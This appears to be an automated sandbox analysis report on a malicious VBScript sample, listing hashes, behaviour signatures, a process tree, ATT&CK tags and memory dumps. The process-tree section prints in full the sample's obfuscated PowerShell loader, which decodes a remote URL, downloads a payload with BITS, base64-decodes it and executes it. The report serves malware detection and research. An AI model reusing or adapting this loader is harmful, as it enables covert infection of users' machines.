5dcfac410a8ac5371ec25cbf19002209f1d52c7429ea992e2efd965ff55d4fa9

Resubmissions

23-02-2024 03:45

240223-ea6qpsaf9t 10

23-02-2024 02:03

240223-cg4htahg5x 10

Analysis

max time kernel
149s
max time network
159s
platform
windows7_x64
resource
win7-20240221-en
resource tags

arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system
submitted
23-02-2024 03:45

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

e4499912964280ec3adc3131a12d5415a577bcd29d7259a38e928ba87ad6c03a.vbs
Size

25KB
MD5

1551bbfea2c142e2bd5ecd100015a9e4
SHA1

bfb829ed539f0a34d80ef70d13a82163b6823075
SHA256

e4499912964280ec3adc3131a12d5415a577bcd29d7259a38e928ba87ad6c03a
SHA512

e5cd1e9365d2555de804268dab3b38aed02bbe2a767a43a2712cecbc9e25e7cd3fcd7c7fdd71759f446da93c2d61bdfcbd295f71950f9916ff6befd64b11440d
SSDEEP

384:MviwoXl26mMYhPD5nvjaO8b/29/Bk+TZdR5X8nMPoa/pDF63NXEltOp:twonmBhPNraOo/29/N7nX+ioA63ubw

Score

8^/10

Malware Config

Signatures

Blocklisted process makes network request 1 IoCs

Processes:

WScript.exe

flow pid process

3 2880 WScript.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082
Suspicious behavior: EnumeratesProcesses 1 IoCs

Processes:

powershell.exe

pid process

2672 powershell.exe
Suspicious use of AdjustPrivilegeToken 1 IoCs

Processes:

powershell.exe

description pid process

Token: SeDebugPrivilege 2672 powershell.exe

flow	pid	process
3	2880	WScript.exe

pid	process
2672	powershell.exe

description	pid	process
Token: SeDebugPrivilege	2672	powershell.exe

Suspicious use of WriteProcessMemory 6 IoCs

Processes:

WScript.exepowershell.exe

description	pid	process	target process
PID 2880 wrote to memory of 2672	2880	WScript.exe	powershell.exe
PID 2880 wrote to memory of 2672	2880	WScript.exe	powershell.exe
PID 2880 wrote to memory of 2672	2880	WScript.exe	powershell.exe
PID 2672 wrote to memory of 2488	2672	powershell.exe	cmd.exe
PID 2672 wrote to memory of 2488	2672	powershell.exe	cmd.exe
PID 2672 wrote to memory of 2488	2672	powershell.exe	cmd.exe

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\e4499912964280ec3adc3131a12d5415a577bcd29d7259a38e928ba87ad6c03a.vbs"
1⤵
- Blocklisted process makes network request
- Suspicious use of WriteProcessMemory
PID:2880

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Trismegistic Kiddishness Bahoe #>;$Elisionerne=(cmd /c set /A 115^^0);Function antignostic ([String]$Pedotrophy){$Elisionerne=[char][int]$Elisionerne;$Stolist=$Elisionerne+'ubstring';$Overlbet=8;$Scalfenformationsnetvrket=Banderolerer4($Pedotrophy);For($Scalfe=7; $Scalfe -lt $Scalfenformationsnetvrket; $Scalfe+=$Overlbet){$Tuckets174=$Pedotrophy.$Stolist.Invoke($Scalfe, 1);$Banderolerer=$Banderolerer+$Tuckets174;}$Banderolerer;}function heliography ($Retransmute){. ($Banderolerer01) ($Retransmute);}function Banderolerer4 ([String]$Rygmarvsprvers){$Jerez1=$Rygmarvsprvers.Length-1;$Jerez1;}$Banderolerer02=antignostic 'IschiacT MurbrkrHastvrkaSjufternachromasStyringfNonnatieStabilirBespousr Atrophi LovprinKoppersg Konjun ';$Freskoens49=antignostic 'FjerpenhUroceratTerpinmtSubmittpArbejdss Confar:Elmenub/Cellulo/YttrifebFlusjeri deutere SkjoldcUnthickrFuruncue artocaaStorslatLacunari ContacvKoreaneeFestkld. UnobjecLichtinoVesiculm anslog.AvlsminaWawsreguPantolo/Emissiod HageskfHeliums/InformaOlatterluScintlet FinancsBasaltumIndlsniiEtwasinlFormynde HomocodUnarres.Teleodop TandlsrSpuedkox Starkn ';$Banderolerer01=antignostic 'HerreekiKoketteeEnkeltsxUndiver ';$Banderolerer00=antignostic 'Tilrani$udskreng StereolNonwarroOrcanetb Geocena SemidalRehabil: RhodomJSkinneceDrmmersrNoctogreNephropzAnfrels8Trackle Greenfl=Leafsta BlomsteSPlummett Uncongahorrormr SkattetExtubat- SmotheBPopularifngselst SpringsautopsyTPlugboarNonteleaOuthirinOversprsTylvtunf SiameseGlycaemrShannyl Dngrada-BibliotSCustomioManicuruunconstrParadercVelareneinitial Chamois$SprogbrFPsiloisr UnsepaeSchematsAareladk soigncoEvaporaeDreamlinIndgaaes Dandye4Hydroxy9Suturen Indtast- BerycoD BehandeBabbledsSagerkltsansculi KnejpenGodkendaAntiseptKostbariMatrikeoMilfoilnTuscula alterat$geologeJCerebeleunhazarrTematikeDemilawzEposeti2Devalua ';heliography (antignostic 'Tilbygn$FstnerlgHaandgrlTaxiflyoErhvervbGropingaTingfstlFordici:enkelthJInternae CarriarUnreiteeadelskrzBankful2Unation=Eristic$ WaisteeFunctionStbeskev Samleo:CiruelaaHemelytpNoblifypRdvioledKlerenra HeadshtTrenchlaFemling ') ;heliography (antignostic 'SarsaviISelverhmRubedinpGennempoFissionrDeponert Finerp- SkatteMDiskvaloDiakonsd RendejuKondensl KalkuleCopulat RenograBExhaustiDuessattEndosmosUdfyldnTSpankulrKorrumpaIndebtenTankfulsminiforfquiverleDekanteruninfer ') ;$Jerez2=$Jerez2+'\Nontalented211.Hal' ;heliography (antignostic ' Modbev$UdlednigBrilleflClanlesoBehearkbEurostraGaltenslFawnede:BilggerJProbatieprofbokrhloftereSnekderzKlapred7 Stolea=Excreta(ArrestfTZonureteTaurangsTotalfet Graadi-HjlpemeP Misanta Unputat SucroshHjttale Skosenm$ PellekJTraadheeTonekunrRectangeoocystizbagsder2Gidesas)Kinswom ') ;while (-not $Jerez7) {heliography (antignostic 'SnevejrITincalmfHungers Pachan(Elberet$reciproJWeathereSkarprerSlaasspeSammenszCrewerf8Flyblew.EqualedJ TimetaoNdretspbAfbalanSSkraldetForpuppaTrothpltJdekageeTuscher staalhj-XerophteUrnmakeq Feltnu Dombogs$RhataniB SaiminaMennesknTretrindTriodoneMadrilrrScratchoUdbasunlUnderteeRegearerCologneestempelrSnestor0Pavisad2Makkers)Totemme submerg{CounterSSamensut ZiegadakonsumfrGodsetstWaferli-bakkekaSPartsanlIndstifeGeniusee SkjoldpRapsfrr Noninte1 righol}PrealloeUnbunchlPeterkis vendave Ainuco{StnnedeSEggplantconformaDisencorStatsmitCloddin-LsgngerSUndramalBistikkeUniverse StatompBenedic Claveli1Vennern;UnreplehDdedanseReascenlUmindeliMetrifio klikkegCentrifrAartusia GrdhovpSnapsflh HulkoryCornric Rydning$PlsefabBForhaanaTriangunSecundidIndulgeeRinosper IndvejoReassurlHjemsteecircumsrWhirligeSkurenorNonanal0Deuniti0Fiskebl} Hebrer ');heliography (antignostic 'burdene$ agrarpg kolosslDvrghneoBedriftbStoraxeaAnemosclbaggrun:JeweddaJPinsebeePensumbrNysselieLandbruzPseudoz7 Armage=Carboxy(BankfulT UplifteUnapplisNarcotit Udmanv-AgriasuPEnkimbla PincettHemadmah Collar Pattyp$ DecompJForholdeNosebanrProratie TredobzVirksom2 Seerst)Philobo ') ;}heliography (antignostic 'Gimblet$SubmuscgMarginslBestreno DissolbTenorfla TimesllMolecul:TombolaBKaresserStewardn UnrecoeDorsodylanticycoUnbeingkDukkestk UnmeteeAnstrgnrTaagngeeCliakiis Hovedp Frushen=Pretens SteelyaGRetsinaeAtriumet Overne- ManufaCTrassrzoInhumannirrepartGensmaneDrjhedenRydderbtStolema Fragtr$AngmagsJPrepayieMercaptrWrastleehypotekz Wooshe2Brandgu ');heliography (antignostic 'vampyrs$IncessagBiersanlBaalfrdo Flyverb SrprgeaAnvistcl opspar:BetingeVBlackspafinansln ForstldTachytea HumorrlSupermoiTenaculsTerminaeArousefdStemmeu hypnoth= Bertha Disintr[BornholSSpirlinyPersonasBankgartGeneraleStiftelmUrochlo.SmilersCLibkinboIlsommennonadopvJarldmmeTvedelirHadjesctAnaesth]Tatties:Polilla:BiotekfFWasherirNephropoUnderesmunflexiBMuezzina SkoetnsOverskre Opreth6Syltetj4 ShuttaSModerattSulsunpr Bortsli Fejelinbloodrigheapsre(Costost$bebossuBIndissorSalomonnBeskylleAircondl Kontrao ApachekValghankLatentieEndymakrObjectieKorresps unvess) Tyrole ');heliography (antignostic 'Ranunkl$FeltteggBlokkallAcidifioUnnutrib PleuraaGuisinglTorulae:citizenBSmrrebraMonobronDiktatudInterjeeCollectrRewidenoNegativlLiquidleAflggerrBrnehaveDibatagrYarurod2 Genera Cumulus=Porsite Unsetud[ GasmotS MandolyGenskresPilhenvtKillcaleFulldopmFutterl. TeratoT KvintaeEngelssx UngenttGreenhi. UlotriEStjfiltnUnflighcExceptioHavanesdAnordniiTiloforn ProvocgRoadwor] Viltre:Gastrog:UmanmarA ChanteSMiddagsCLovgiveIUsurpatI Misemp.BendiksG Liguste ParrittClinomeSbolideptPteridirretsikkiHydroxan paprofgUbestik(Mokkafa$ DigesmVmarmelaaPentatentraktred lseprvaUnsurfalCemetari Enantisbyfornye carnivd Fuldfo)Isotrop ');heliography (antignostic 'Retreat$Mentoreg ForbrulOvermodo KriminbVivetteaTamisnvl Tonici:GasoholBRakesteaShreeslnFlyvevad HjlpeleAmmunitrAnmeldeoIssedonlPycniteeAdenomyrnkdrvogeColletsrfavored3Hidsigb=Uhmmetd$SertrinB AlfabeaFyldninnTininesdParamase extensr Friblao PerifelPayyetaeSaldienr MichaeePeritrorRottegi2Unsoldi.SocialbsMajdagsu OrdbilbHollandsLbegangtUdmelderHonorarifinialsnGalactogJumelle(Luneful3Krealiz2Mairsfl6 Absces8Troublo7Sarcopl7 Samkve,Quercif3Untempo2Sparekn3Mesters5Buckele1Marguer)Retarda ');heliography $Banderolerer3;"
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2672

C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c set /A 115^^0
3⤵
PID:2488

Network

MITRE ATT&CK Matrix ATT&CK v13

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Resource Development

Reconnaissance

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\Cab3748.tmp
Filesize
65KB

MD5
ac05d27423a85adc1622c714f2cb6184

SHA1
b0fe2b1abddb97837ea0195be70ab2ff14d43198

SHA256
c6456e12e5e53287a547af4103e0397cb9697e466cf75844312dc296d43d144d

SHA512
6d0ef9050e41fbae680e0e59dd0f90b6ac7fea5579ef5708b69d5da33a0ece7e8b16574b58b17b64a34cc34a4ffc22b4a62c1ece61f36c4a11a0665e0536b90d

Download Submit
memory/2672-20-0x000000001B540000-0x000000001B822000-memory.dmp

Filesize
2.9MB

Download
memory/2672-22-0x000007FEF5E20000-0x000007FEF67BD000-memory.dmp

Filesize
9.6MB

Download
memory/2672-21-0x0000000002A20000-0x0000000002A28000-memory.dmp

Filesize
32KB

Download
memory/2672-23-0x00000000028D0000-0x0000000002950000-memory.dmp

Filesize
512KB

Download
memory/2672-25-0x00000000028D0000-0x0000000002950000-memory.dmp

Filesize
512KB

Download
memory/2672-24-0x000007FEF5E20000-0x000007FEF67BD000-memory.dmp

Filesize
9.6MB

Download
memory/2672-26-0x00000000028D0000-0x0000000002950000-memory.dmp

Filesize
512KB

Download
memory/2672-27-0x000000001C5F0000-0x000000001C612000-memory.dmp

Filesize
136KB

Download
memory/2672-28-0x000000001B410000-0x000000001B422000-memory.dmp

Filesize
72KB

Download
memory/2672-29-0x000007FEF5E20000-0x000007FEF67BD000-memory.dmp

Filesize
9.6MB

Download
memory/2672-30-0x00000000028D0000-0x0000000002950000-memory.dmp

Filesize
512KB

Download
memory/2672-31-0x00000000028D0000-0x0000000002950000-memory.dmp

Filesize
512KB

Download
memory/2672-32-0x00000000028D0000-0x0000000002950000-memory.dmp

Filesize
512KB

Download
memory/2672-33-0x00000000028D0000-0x0000000002950000-memory.dmp

Filesize
512KB

Download